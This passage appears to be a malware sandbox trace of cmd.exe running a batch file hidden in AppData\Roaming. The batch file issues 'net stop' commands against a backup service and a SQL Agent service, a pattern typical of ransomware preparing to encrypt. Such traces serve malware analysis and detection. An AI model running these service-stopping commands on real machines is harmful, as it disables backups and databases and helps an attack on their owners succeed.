(lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.754] GetProcessHeap () returned 0x3e0000 [0038.754] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.755] GetEnvironmentStringsW () returned 0x3f8408* [0038.755] GetProcessHeap () returned 0x3e0000 [0038.755] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.755] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.755] GetProcessHeap () returned 0x3e0000 [0038.755] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0038.755] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0038.755] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.755] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0038.755] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.755] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0038.755] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.755] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0038.755] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.755] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0038.756] SetConsoleInputExeNameW () returned 0x1 [0038.756] GetConsoleOutputCP () returned 0x1b5 [0038.756] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0038.756] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0038.756] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0038.756] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.756] SetFilePointer (in: hFile=0x78, lDistanceToMove=1226, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4ca [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.756] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0038.756] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0038.757] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.757] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4ca [0038.757] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x13f7, lpOverlapped=0x0) returned 1 [0038.757] SetFilePointer (in: hFile=0x78, lDistanceToMove=1252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e4 [0038.757] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop PDVFSService /y\r\n\r\notection ServiceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 26 [0038.757] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.757] GetFileType (hFile=0x78) returned 0x1 [0038.757] _get_osfhandle (_FileHandle=3) returned 0x78 [0038.757] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e4 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0038.757] GetProcessHeap () returned 0x3e0000 [0038.757] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0038.758] _tell (_FileHandle=3) returned 1252 [0038.758] _close (_FileHandle=3) returned 0 [0038.758] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0038.758] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0038.758] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0038.758] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0038.758] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0038.758] _wcsicmp (_String1="net", _String2="CD") returned 11 [0038.758] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0038.758] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0038.758] _wcsicmp (_String1="net", _String2="REN") returned -4 [0038.758] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0038.758] _wcsicmp (_String1="net", _String2="SET") returned -5 [0038.758] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0038.758] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0038.758] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0038.758] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0038.758] _wcsicmp (_String1="net", _String2="MD") returned 1 [0038.758] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0038.758] _wcsicmp (_String1="net", _String2="RD") returned -4 [0038.758] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0038.758] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0038.759] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0038.759] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0038.759] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0038.759] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0038.759] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0038.759] _wcsicmp (_String1="net", _String2="VER") returned -8 [0038.759] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0038.759] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0038.759] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0038.759] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0038.759] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0038.759] _wcsicmp (_String1="net", _String2="START") returned -5 [0038.759] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0038.759] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0038.759] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0038.759] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0038.759] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0038.759] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0038.759] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0038.759] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0038.759] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0038.759] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0038.759] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0038.759] SetErrorMode (uMode=0x0) returned 0x1 [0038.759] GetProcessHeap () returned 0x3e0000 [0038.759] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0038.759] GetProcessHeap () returned 0x3e0000 [0038.759] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0038.759] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.759] GetProcessHeap () returned 0x3e0000 [0038.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0038.759] GetProcessHeap () returned 0x3e0000 [0038.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0038.760] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0038.760] GetProcessHeap () returned 0x3e0000 [0038.760] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0038.760] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.760] GetProcessHeap () returned 0x3e0000 [0038.760] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0038.760] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0038.760] GetProcessHeap () returned 0x3e0000 [0038.760] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0038.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.760] GetLastError () returned 0x2 [0038.760] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.760] GetLastError () returned 0x2 [0038.760] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.760] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.760] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0038.761] GetLastError () returned 0x2 [0038.761] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0038.761] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0038.761] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.761] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0038.761] SetErrorMode (uMode=0x0) returned 0x1 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0038.761] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0038.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0038.761] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.761] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0038.761] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0038.761] GetProcessHeap () returned 0x3e0000 [0038.762] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0038.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.762] GetLastError () returned 0x2 [0038.762] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.762] GetLastError () returned 0x2 [0038.762] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0038.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0038.762] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0038.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0038.762] GetLastError () returned 0x2 [0038.762] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0038.762] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0038.762] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0038.763] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0038.763] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0038.763] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0038.763] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0038.763] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop PDVFSService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop PDVFSService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop PDVFSService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xbc4, dwThreadId=0xbc8)) returned 1 [0038.766] CloseHandle (hObject=0x78) returned 1 [0038.766] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0038.766] GetProcessHeap () returned 0x3e0000 [0038.766] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.766] GetEnvironmentStringsW () returned 0x3f8408* [0038.766] GetProcessHeap () returned 0x3e0000 [0038.766] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.767] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.767] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0038.994] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0038.994] CloseHandle (hObject=0x74) returned 1 [0038.994] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0038.994] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0038.994] GetProcessHeap () returned 0x3e0000 [0038.994] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.994] GetEnvironmentStringsW () returned 0x3f8408* [0038.994] GetProcessHeap () returned 0x3e0000 [0038.994] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.994] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.994] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0038.994] GetProcessHeap () returned 0x3e0000 [0038.994] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0038.994] GetEnvironmentStringsW () returned 0x3f8408* [0038.994] GetProcessHeap () returned 0x3e0000 [0038.995] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0038.995] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0038.995] GetProcessHeap () returned 0x3e0000 [0038.995] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0038.995] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0038.995] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.995] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0038.995] _get_osfhandle (_FileHandle=1) returned 0x264 [0038.995] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0038.995] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.995] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0038.995] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0038.995] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0038.996] SetConsoleInputExeNameW () returned 0x1 [0038.996] GetConsoleOutputCP () returned 0x1b5 [0038.996] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0038.996] SetThreadUILanguage (LangId=0x0) returned 0x409 [0038.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0038.996] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0038.996] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.996] SetFilePointer (in: hFile=0x74, lDistanceToMove=1252, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e4 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0038.996] GetProcessHeap () returned 0x3e0000 [0038.996] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0038.997] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.997] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e4 [0038.997] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x13dd, lpOverlapped=0x0) returned 1 [0038.997] SetFilePointer (in: hFile=0x74, lDistanceToMove=1290, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x50a [0038.997] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=38, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SQLAgent$PROFXENGAGEMENT /y\r\nerviceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 38 [0038.997] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.997] GetFileType (hFile=0x74) returned 0x1 [0038.997] _get_osfhandle (_FileHandle=3) returned 0x74 [0038.997] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x50a [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0038.997] GetProcessHeap () returned 0x3e0000 [0038.997] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0038.998] _tell (_FileHandle=3) returned 1290 [0038.998] _close (_FileHandle=3) returned 0 [0038.998] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0038.998] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0038.998] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0038.998] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0038.998] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0038.998] _wcsicmp (_String1="net", _String2="CD") returned 11 [0038.998] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0038.998] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0038.998] _wcsicmp (_String1="net", _String2="REN") returned -4 [0038.998] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0038.998] _wcsicmp (_String1="net", _String2="SET") returned -5 [0038.998] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 